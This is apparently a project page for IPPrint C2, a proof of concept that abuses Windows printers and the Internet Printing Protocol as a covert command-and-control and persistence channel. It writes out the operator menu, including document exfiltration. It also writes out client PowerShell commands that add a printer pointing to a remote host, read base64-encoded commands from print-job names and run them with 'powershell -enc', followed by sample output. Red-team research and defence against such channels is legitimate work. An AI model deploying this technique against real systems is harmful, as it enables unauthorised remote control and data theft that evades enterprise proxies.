IPPrint C2: PoC for using MS Windows printers for persistence / C2 via Internet Printing

by ·

IPPrint C2

A Proof-of-Concept for using Microsoft Windows printers for persistence/command and control via Internet Printing.

Printing systems are an often overlooked target for attackers looking to establish command and control (C2) channels on a victim’s network. An attacker can abuse the operating system’s printing system to add and remove printers and create and manipulate printing jobs to achieve full C2 communication. We have developed a complete proof of concept of such a solution that we have successfully tested in real-world red teaming exercises. By understanding the approach taken in this specific abuse of printing systems, we can take steps to secure them and prevent them from being exploited by malicious actors.

Background story

The idea was to create a basic C2 for engagements using built-in Windows functionalities, which can then be used to execute arbitrary commands or load a preferable C2 solution.

A feature in Microsoft Windows was used that enables to install of shared printers through Internet Printing Protocol. Regular users can add a printer without administrative privileges as long there is no driver installation, so usage of existing drivers was mandatory. A default “Microsoft Print to PDF” driver was used.

The commands that will be executed are sent from the C2 Internet Printing server to the printer’s document queue as base64-encoded document names. With basic PowerShell, clients can then obtain these document names from the queue and execute commands on themselves. Also, clients can print documents to this printer that will be saved to a file on the C2 server which is useful to fetch results from executed commands or to exfiltrate documents. An additional plus was that adding a printer shared on the Internet passed through a couple of web proxy solutions commonly used in enterprises. Tested on Windows Server 2019 and Windows 10 / 11.

Server

Internet Information Services, Windows Print Services, Print Server and Internet Printing are required to set up a C2 server. Anonymous authentication is enabled on Internet Information Services so clients can obtain the document queue without authentication and the owner of print jobs is the IUSR user account. The server also installs the shared printer for itself and uses it to submit jobs to its print queue, otherwise, the document owner would not be the IUSR user and clients would not be able to obtain the document name from the queue.

The installation script is provided in this repository and should work. Check if you can access your printer to make sure everything went well:

http(s)://<IP or DNS>/printers/
http(s)://<IP or DNS>/printers/<printername>/.printer

Once all is set up, run the IPPrintC2.ps1 and enter commands that you would like to execute on the client through the document name. The document name has its length limitations, so if the length of the base64 encoded command in the document name is larger than 255 characters, it gets split to several documents in the print queue. This is handled by the IPPrintC2 script while the concatenation is handled by the client.

PS C:\Users\administrator\Desktop> .\IPPrintC2.ps1
IPPrint C2 Server
1. Select the default C2 printer.
2. Enter the command to execute on the client through the document name.
3. Enter the path of the PowerShell script you would like to execute.
4. Exfiltrate remote documents.
5. Read IIS logs.
6. Clear the print queue.
7. Kill all clients.
8. Quit.
What do you want to do?: 2
To print output of multiple commands, use this: [scriptblock]$x={whoami;hostname;ipconfig};$x.invoke()
Enter commands you wish to execute: [scriptblock]$x={whoami /all;hostname};$x.invoke()

You can also load PowerShell scripts. Keep the scripts simple as they may take a while to get split and sent to the document queue. Also, the scripts are one-off since the print queue eventually gets cleared and the character limit is 32767.

Client

To execute commands on the client, the addition of a printer and a persistent job to obtain and execute commands is needed. Examples:

PS C:\Users\regular> Add-Printer XPS -PortName https://somewhere.on.azure.com/printers/af/.printer -DriverName "Microsoft Print To PDF"

PS C:\Users\regular> Get-Printer XPS |fl


Name                         : XPS
ComputerName                 :
Type                         : Local
ShareName                    :
PortName                     : https://somewhere.on.azure.com/printers/af/.printer
DriverName                   : Microsoft Print To PDF
Location                     :
Comment                      :
SeparatorPageFile            :
PrintProcessor               : winprint
Datatype                     : RAW
Shared                       : False
Published                    : False
DeviceType                   : Print
PermissionSDDL               :
RenderingMode                :
KeepPrintedJobs              : False
Priority                     : 1
DefaultJobPriority           : 0
StartTime                    : 0
UntilTime                    : 0
PrinterStatus                : Normal
JobCount                     : 0
DisableBranchOfficeLogging   :
BranchOfficeOfflineLogSizeMB :
WorkflowPolicy               :

PS C:\Users\regular> ((get-printjob XPS).documentname -join "")
WwBzAGMAcgBpAHAAdABiAGwAbwBjAGsAXQAkAHgAPQB7AHcAaABvAGEAbQBpACAALwBhAGwAbAA7AGgAbwBzAHQAbgBhAG0AZQB9ADsAJAB4AC4AaQBuAHYAbwBrAGUAKAApAA==

PS C:\Users\regular> powershell -enc ((get-printjob XPS).documentname -join "")

USER INFORMATION
----------------

User Name               SID
======================= ==============================================
desktop-printingfun\regular S-1-5-21-1829223926-2430627930-1039442773-1002


GROUP INFORMATION
-----------------

Group Name                             Type             SID          Attributes
====================================== ================ ============ ==================================================
Everyone                               Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                          Alias            S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Performance Log Users          Alias            S-1-5-32-559 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\INTERACTIVE               Well-known group S-1-5-4      Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON                          Well-known group S-1-2-1      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users       Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization         Well-known group S-1-5-15     Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account             Well-known group S-1-5-113    Mandatory group, Enabled by default, Enabled group
LOCAL                                  Well-known group S-1-2-0      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication       Well-known group S-1-5-64-10  Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label            S-1-16-8192


PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                          State
============================= ==================================== ========
SeShutdownPrivilege           Shut down the system                 Disabled
SeChangeNotifyPrivilege       Bypass traverse checking             Enabled
SeUndockPrivilege             Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set       Disabled
SeTimeZonePrivilege           Change the time zone                 Disabled

DESKTOP-PRINTINGFUN

Download

Copyright (c) 2024 Diverto

Tags: